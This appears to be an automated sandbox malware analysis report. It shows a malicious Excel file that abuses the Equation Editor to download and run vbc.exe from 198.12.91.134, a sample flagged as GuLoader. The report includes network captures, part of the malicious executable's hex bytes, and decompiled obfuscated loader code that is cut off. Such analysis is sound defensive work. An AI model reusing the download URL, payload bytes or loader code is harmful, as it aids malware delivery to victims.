Aug 2, 2021 14:50:27.576610088 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576625109 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576647997 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576663971 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576687098 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576700926 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576725960 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576745987 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576761961 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576765060 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576802015 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576818943 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576838970 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576843977 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576886892 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576894999 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576931000 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576946020 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.576967955 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.576986074 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.577013969 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.577200890 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.577240944 CEST	80	49165	198.12.91.134	192.168.2.22
Aug 2, 2021 14:50:27.577269077 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.581118107 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:27.581137896 CEST	49165	80	192.168.2.22	198.12.91.134
Aug 2, 2021 14:50:28.088450909 CEST	49165	80	192.168.2.22	198.12.91.134

HTTP Request Dependency Graph

198.12.91.134

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	198.12.91.134	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 2, 2021 14:50:27.015583038 CEST	0	OUT	GET /win/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 198.12.91.134 Connection: Keep-Alive
Aug 2, 2021 14:50:27.128052950 CEST	1	IN	HTTP/1.1 200 OK Date: Mon, 02 Aug 2021 12:50:18 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Mon, 02 Aug 2021 10:45:08 GMT ETag: "1c000-5c891434c93da" Accept-Ranges: bytes Content-Length: 114688 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c3 1c 80 4b 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 40 01 00 00 80 00 00 00 00 00 00 44 11 00 00 00 10 00 00 00 50 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 d0 01 00 00 10 00 00 e1 60 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 4b 01 00 28 00 00 00 00 70 01 00 96 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 3d 01 00 00 10 00 00 00 40 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 5c 11 00 00 00 50 01 00 00 10 00 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 96 5b 00 00 00 70 01 00 00 60 00 00 00 60 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELK@DP@`tK(p[( \|.text=@ `.data\PP@.rsrc[p``@@IMSVBVM60.DLL
Aug 2, 2021 14:50:27.128122091 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2021 14:50:27.128165007 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2021 14:50:27.128204107 CEST	6	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Aug 2, 2021 14:50:27.240540981 CEST	7	IN	Data Raw: 16 4f 18 18 19 4f 2e 18 04 4f 2d 09 13 4f 27 0f 11 4f 2d 07 10 4f 26 04 13 4f 25 1b 11 4f 31 10 11 4f 2c 2c 04 4f 35 33 0d 4f 27 27 1a 4f 3d 2b 10 4f 38 38 14 4f 2b 0d 2e 4f 24 0c 2d 4f 28 05 2d 4f 23 05 2b 4f 22 0f 27 4f 21 02 26 4f 3e 09 2b 4f Data Ascii: OO.O-O'O-O&O%O1O,,O53O''O=+O88O+.O$-O(-O#+O"'O!&O>+O<O<!O3"O<$O5#O"-O7%O#>O4:O6;O&()O1%.O9%O9'!O1%$O66+O666O6`O7vO4O9O2O+$O0+O'8O'3O=:O0O0#OpOOOOOO&O*O'O)O6O
Aug 2, 2021 14:50:27.240597010 CEST	8	IN	Data Raw: 8e 8e 8e 21 4a 4a 74 01 2d 2c 2c d9 d9 d9 d9 d9 d9 d9 d9 d4 d9 8c 21 51 20 37 b2 4f 4f 4f 4f 4f b2 03 18 0f 4a 5c 8e 9d 9d 9d 83 99 99 96 97 99 99 83 9d 8e 0d 4c 5c 29 d9 d9 d9 d5 d3 d3 d3 ef d3 ef d3 d3 d3 f1 3b 50 3f 37 b2 4f 4f 4f 4f 4f b2 29 Data Ascii: !JJt-,,!Q 7OOOOOJ\L\);P?7OOOOO)@G;GJQ?7OOOOOGE47473Kx=7OOOOO)J444444;J\Q72OOOOOJ*54444443
Aug 2, 2021 14:50:27.240633965 CEST	10	IN	Data Raw: c5 c5 48 47 47 47 47 47 47 47 4b d7 a8 bb 97 46 f5 b5 b5 bd b5 bd 4e 25 9e 43 86 b5 b5 86 4c 4c b5 b5 b5 17 75 4f b2 23 f7 f7 9c be 9e 88 d7 2c c5 c5 47 86 86 86 86 86 86 86 4e 8d 85 f7 f7 47 b5 b5 bf f9 b5 b5 75 43 f0 43 86 b5 b5 86 4e 84 b5 b5 Data Ascii: HGGGGGGGKFN%CLLuO#,GNGuCCNNOO#GN5uzFN9EGGOO&99>GNNGNLzGCzO8511ZGGGGGGGZNCJLzzNO&PP&&&&&
Aug 2, 2021 14:50:27.240681887 CEST	11	IN	Data Raw: dc dc 23 4f d5 d5 24 4f c8 c9 3d 4f d7 d8 39 4f ea d7 33 4f e7 e8 25 4f ff e0 21 4f e7 e9 3c 4f e5 e5 3b 4f e9 ec 35 4f e4 e5 34 4f e0 fe 36 4f fd fe 3c 4f fc fb 32 4f f4 f3 34 4f 23 6d ca 4f 3a 64 c4 4f 32 73 c6 4f 34 62 de 4f 33 7e de 4f c8 75 Data Ascii: #O$O=O9O3O%O!O<O;O5O4O6O<O2O4O#mO:dO2sO4bO3~OuOOOOOOOOOOOOO'O,O;O5O0O4O.O"O(O;OOO-O&O-O$O%O6O(O?O:O0O%O9O1O3OO
Aug 2, 2021 14:50:27.240724087 CEST	13	IN	Data Raw: 2b 29 29 1d 7e 64 7e 1d e3 a8 bc 0c 87 87 f9 58 8e 16 f9 87 06 5b 09 87 f9 4f b2 31 8e f7 d3 29 de 29 5f 70 0e 0e 0e 4a f4 97 32 f9 b2 b2 b2 16 32 06 b2 b2 13 41 b2 b2 0c 4f b2 31 8e 8d 8f 8e 86 86 0c 84 84 84 84 73 f3 85 06 87 f6 0c 87 87 58 0e Data Ascii: +))~d~X[O1))_pJ22AO1sXO311MXHO.?<<<<<mTTnTm<YCNOOOOOOOOOOOOOOOOOOOOOOOOHOOOHOOOHOOOHO
Aug 2, 2021 14:50:27.240761042 CEST	14	IN	Data Raw: 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 46 5f 58 4e 42 5c 5b 5b 5a 5a Data Ascii: OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOF_XNB\[[ZZZZ[[[VF_LLE\\[[ZZZZZ[^FLNJHE]\\[[ZZZW_NNXGHHG]\\\\[[WDN[[CGHHH]]\\\\UDIWR[]GHHH]]]\[_@I[PS\]GHHH]]]UD^I[ooS\]EHHHH[_@^I\RnQY\]]HHEU@^^ICSnnQYJOMMOOOK^ICYFOOIOnOO
Aug 2, 2021 14:50:27.240799904 CEST	16	IN	Data Raw: 24 b0 db c1 27 b0 2e 16 7e b0 27 2f 7c b0 36 3f 78 b0 ce 38 76 b0 cf 39 77 b0 c5 ce 1d b0 b0 b0 b0 b0 4f 4f 4f 03 4f 4f 4f 60 4f 4f 4f 5a 4f 4f 4f 4f 4f 4f 4f 4f b0 b0 b0 b0 28 71 14 b0 14 6b 16 b0 24 67 27 b0 de 0d cc b0 f9 2e d5 b0 9f 37 e3 b0 Data Ascii: $'.~'/\|6?x8v9wOOOOOO`OOOZOOOOOOOO(qk$g'.7 +P4S<R!j%/a(+y,+u.ux{~`bdeeeeeedb~yu+q8&.T",m3>h1=h8tOOOOOObOOOZOOOOO

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2696 Parent PID: 584

General

Start time:	14:49:39
Start date:	02/08/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fff0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 1980 Parent PID: 584

General

Start time:	14:50:00
Start date:	02/08/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 2364 Parent PID: 1980

General

Start time:	14:50:01
Start date:	02/08/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	114688 bytes
MD5 hash:	27BF14807BC9D5CD2D823293F43C3A3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 22%, Virustotal, Browse Detection: 11%, ReversingLabs
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 2364 Parent PID: 1980 vbc.exeCOMMON

Executed Functions

Function 003B5A62, Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 746memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-00000001A3861579), ref: 003B5BA5

Strings

}W31, xrefs: 003B4DD7
`~vG, xrefs: 003B4FB1

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: `~vG$}W31
API String ID: 2167126740-4278674903
Opcode ID: 83eeea10594ebc07d13379abd501daa2b565abec8a2a0c66940287ac25e09fa9
Instruction ID: b660dd3386300061f947b56320e4df7b66138e49106a0ee3953879dd8e523fbd
Opcode Fuzzy Hash: 83eeea10594ebc07d13379abd501daa2b565abec8a2a0c66940287ac25e09fa9
Instruction Fuzzy Hash: DA62DAB2604389DFDB749F38CD85BDABBA2FF55340F55412AED899B610D3309A81CB42

Uniqueness

Uniqueness Score: -1.00%

Function 003B5968, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(-00000001A3861579), ref: 003B5BA5

Strings

}W31, xrefs: 003B4DD7
`~vG, xrefs: 003B4FB1

Memory Dump Source

Source File: 00000006.00000002.2350788579.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: `~vG$}W31
API String ID: 2167126740-4278674903
Opcode ID: bdb038aead7cde1b31969c9141ebf74346f74f31a6cdd63c2ebc47e7a8eb8203
Instruction ID: 109185968db93445798125a2198f6b76095838df84ef592f8bfee541f750c6d7
Opcode Fuzzy Hash: bdb038aead7cde1b31969c9141ebf74346f74f31a6cdd63c2ebc47e7a8eb8203
Instruction Fuzzy Hash: 1641BF71608385CFDB319E38CC85BEA7BE2EF56324F54422DDD899B264D3308A80DB46

Uniqueness

Uniqueness Score: -1.00%

Function 00401144, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 59%

			_entry_(signed int __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr* _t66;
				signed int _t67;
				signed int _t68;
				signed char _t69;
				signed int _t72;
				signed char _t74;
				signed char _t78;
				signed int _t79;
				signed int _t80;
				signed int _t83;
				void* _t88;
				intOrPtr* _t89;
				void* _t94;
				signed int* _t95;
				void* _t97;
				void* _t99;
				signed char _t102;
				signed int _t108;
				signed int _t109;
				signed char _t110;
				signed int _t112;
				void* _t118;
				signed int* _t119;
				void* _t124;
				intOrPtr* _t131;
				intOrPtr* _t132;
				void* _t138;
				void* _t139;
				signed int* _t145;
				signed int* _t147;
				signed int* _t149;
				signed int* _t151;
				void* _t154;
				void* _t155;
				intOrPtr* _t161;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t167;
				void* _t168;
				signed int _t181;
				void* _t182;
				signed int _t191;
				void* _t193;
				void* _t194;
				void* _t195;
				signed int _t196;
				intOrPtr* _t208;
				intOrPtr* _t209;
				signed int _t211;
				signed char _t216;
				intOrPtr* _t220;
				signed int _t225;

				_push("VB5!6&*"); // executed
				L0040113E(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t66 = __eax + 1;
				 *_t66 =  *_t66 + _t66;
				 *_t66 =  *_t66 + _t66;
				 *_t66 =  *_t66 + _t66;
				 *((intOrPtr*)(__edx - 0x2d91e317)) =  *((intOrPtr*)(__edx - 0x2d91e317)) + __ebx;
				_t67 = _t66 -  *0x039CA936;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *__ecx =  *__ecx + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *((intOrPtr*)(__ebx + 0x4f)) =  *((intOrPtr*)(__ebx + 0x4f)) + _t67;
				_t88 = __ebx + 1 - 1;
				_pop(_t97);
				_push(0xd26e1ce9);
				 *((intOrPtr*)(_t182 + 0x76)) =  *((intOrPtr*)(_t182 + 0x76)) + _t97;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				_t194 = _t193 - 1;
				 *_t67 =  *_t67 ^ _t67;
				es = _t88;
				asm("pushfd");
				asm("arpl [edi-0x5ff889ac], si");
				asm("adc eax, 0xb00ef4e9");
				asm("sbb edi, ecx");
				_t89 = _t88 + 1;
				asm("movsd");
				asm("insd");
				asm("cdq");
				asm("iretw");
				asm("adc [edi+0xaa000c], esi");
				asm("pushad");
				asm("rcl dword [ebx], cl");
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				_pop(_t99);
				 *_t67 =  *_t67 + _t67;
				 *_t67 =  *_t67 + _t67;
				_t68 = _t67 |  *_t67;
				_push(0xd26e1ce9);
				_push(_t194);
				_push(_t89);
				_push(_t68);
				_push(0xd26e1ce9);
				_t102 = _t99 + 1;
				 *0x53000f01 =  *0x53000f01 + _t102;
				_push(_t194);
				_t195 = _t194 + 1;
				_t124 = __edi + 1;
				_push(0xd26e1ce9);
				_push(_t195);
				_push(0xd26e1ce9);
				_t196 = _t195 + 1;
				_push(0xd26e1ce9);
				_t181 = __esi - 0xffffffffffffffff + 1 - 1;
				_push(_t89);
				 *_t102 =  *_t102 + _t89;
				 *_t68 =  *_t68 + _t68;
				 *_t89 =  *_t89 + _t68;
				asm("ficom word [edi]");
				 *((intOrPtr*)(_t196 + _t181 * 2)) =  *((intOrPtr*)(_t196 + _t181 * 2)) + _t102;
				_push(_t124);
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				_push(es);
				 *_t68 =  *_t68 + 0xffffffffa4dc39d4;
				 *_t68 =  *_t68 ^ _t68;
				 *_t102 =  *_t102 + _t68;
				 *_t68 =  *_t68 + _t102;
				 *((intOrPtr*)(_t68 + 0x6600000e)) =  *((intOrPtr*)(_t68 + 0x6600000e)) + _t102;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				 *_t102 =  *_t102 + _t68;
				 *_t68 =  *_t68 + _t102;
				 *((intOrPtr*)(_t68 + 0xe000008)) =  *((intOrPtr*)(_t68 + 0xe000008)) + _t102;
				asm("sldt word [eax]");
				asm("adc [eax], dl");
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 | _t68;
				ss = 0xb6000005;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 ^ 0xffffffffa4dc39d4;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				 *_t68 =  *_t68 + _t68;
				_push(ds);
				asm("sbb eax, 0x20200000");
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				 *_t68 =  *_t68 + _t68;
				 *((char*)(0xffffffffa4dc39d4)) = 0;
				asm("adc [eax], dl");
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 & _t68;
				_push(0x6e000004);
				_push(_t89);
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 - _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 ^ _t68;
				 *_t68 =  *_t68 + _t68;
				asm("pushad");
				 *_t68 =  *_t68 + _t68;
				 *_t102 =  *_t102 + _t68;
				 *_t68 =  *_t68 + _t102;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 | _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				 *_t68 =  *_t68 + _t68;
				_pop(_t94);
				_t95 = _t94 + 1;
				_push(0x63a52703);
				_t118 = _t181;
				asm("outsd");
				_push(_t196);
				_push(_t181);
				_t131 = _t124 - 0xfffffffffffffffb;
				_t191 =  *(_t196 + 0xffffffffa4dc3a21) * 0x7d;
				if(_t191 < 0) {
					L17:
					_t102 = _t102 -  *_t131;
					_t216 = _t102;
					if(_t216 > 0) {
						goto L35;
					} else {
						asm("daa");
						asm("das");
						if(_t216 <= 0) {
							goto L36;
						} else {
							asm("aas");
							_t181 = _t181 &  *(_t68 + 0x4f);
							goto L20;
						}
					}
				} else {
					_t167 = _t131 - 1;
					_t208 = _t167;
					if(_t208 >= 0) {
						L15:
						_t167 = _t167 - 1;
						goto L16;
					} else {
						if(_t208 != 0) {
							L16:
							_t131 = _t167 - 1;
							goto L17;
						} else {
							_push(0x7f4f6c68);
							asm("popad");
							_push(0x4f);
							if(_t208 != 0) {
								L28:
								_t68 = _t68 - 0x51;
								_t102 = _t102 ^  *(_t167 + 0x10);
								goto L29;
							} else {
								_t167 = _t167 - 1;
								_t209 = _t167;
								if(_t209 == 0) {
									L27:
									asm("adc ecx, [edi+0x10]");
									_push(_t118);
									 *(_t167 + 0x11) =  *(_t167 + 0x11) & _t102;
									_push(_t118);
									goto L28;
								} else {
									if(_t209 > 0) {
										L20:
										_t165 = _t131 - 1;
										_push(es);
										 *[fs:edi+0x1f] =  *[fs:edi+0x1f] | _t102;
										goto L21;
									} else {
										if(_t209 == 0) {
											L29:
											_t168 = _t167 - 1;
											asm("adc [edx+0x25], ch");
											goto L30;
										} else {
											if(_t209 >= 0) {
												L21:
												_t163 = _t165 - 1;
												_pop(ds);
												asm("popad");
												_t102 = _t102 +  *((intOrPtr*)(_t163 + 2));
												if(_t102 < 0) {
													_t163 = _t163 - 1;
													_t220 = _t163;
													_push(ds);
													if(_t220 > 0) {
														_t163 = _t163 - 1;
														asm("sbb [esi+0x1b], ah");
													}
													asm("sbb cx, [edi+0x16]");
												}
												if(_t220 == 0) {
													_t167 = _t163 - 1;
													_t68 = _t68 - 0x74;
													goto L27;
												}
												goto L31;
											} else {
												_push(cs);
												if(_t209 >= 0) {
													goto L27;
												} else {
													_t163 = _t167 - 1;
													asm("pcmpgtb mm6, [ebx+0x4f]");
													_t83 = _t68 | 0x1f4f7973;
													if(_t83 < 0) {
														L32:
														if(_t225 >= 0) {
															goto L38;
														} else {
															goto L33;
														}
													} else {
														asm("sbb eax, [ebx]");
														ss = _t196;
														_push(ds);
														_push(_t83);
														_t102 = _t102 |  *_t181;
														asm("popad");
														asm("sbb al, 0x1b");
														_t167 = _t163 - 0xfffffffffffffffd;
														 *0xd26e1ce9 =  *0xd26e1ce9 | _t102;
														_t211 =  *0xd26e1ce9;
														if(_t211 != 0) {
															goto L29;
														} else {
															asm("sbb eax, [edi]");
															if(_t211 == 0) {
																L30:
																asm("daa");
																asm("daa");
																_t163 = _t168 -  *((intOrPtr*)(_t102 + 0x2d));
																L31:
																_t83 = _t68 - 0x2d732a4f;
																_t225 = _t83;
																goto L32;
															} else {
																asm("sbb [ebx+esi*2], ebx");
																asm("adc al, 0x65");
																_t163 = _t167;
																_push(ss);
																if(_t163 <= 0) {
																	L33:
																	_t163 = _t163 - 1;
																	if(_t163 < 0) {
																		L39:
																		asm("sbb [eax], bl");
																		asm("sbb [edi+0x2e], ecx");
																		asm("sbb [edi+ecx*2], al");
																		asm("movups [edi+0x2d], xmm1");
																		es = ss;
																		asm("adc [edi+0x26], cl");
																		_t132 = _t163;
																		_t69 = _t83 - 0x274f1309 + 0x00000013 & 0x314f111b;
																	} else {
																		 *(_t118 + 0x24) =  *(_t118 + 0x24) & _t181;
																		_t131 = _t163;
																		asm("daa");
																		_push(0x33);
																		L35:
																		_t131 = _t131 - 1;
																		asm("aaa");
																		asm("popad");
																		L36:
																		_t132 = _t131 - 1;
																		_t69 = _t68 & 0x00000074;
																		if(_t102 <  *((intOrPtr*)(_t132 + 0x24))) {
																			_t161 = _t132 - 1;
																			 *(_t161 + 0x18) =  *(_t161 + 0x18) | _t102;
																			_t83 = _t69 ^ 0x0000007f | 0x00000006;
																			ss = es;
																			asm("sbb [ebx], ecx");
																			_t163 = _t161;
																			_push(ss);
																			_push(cs);
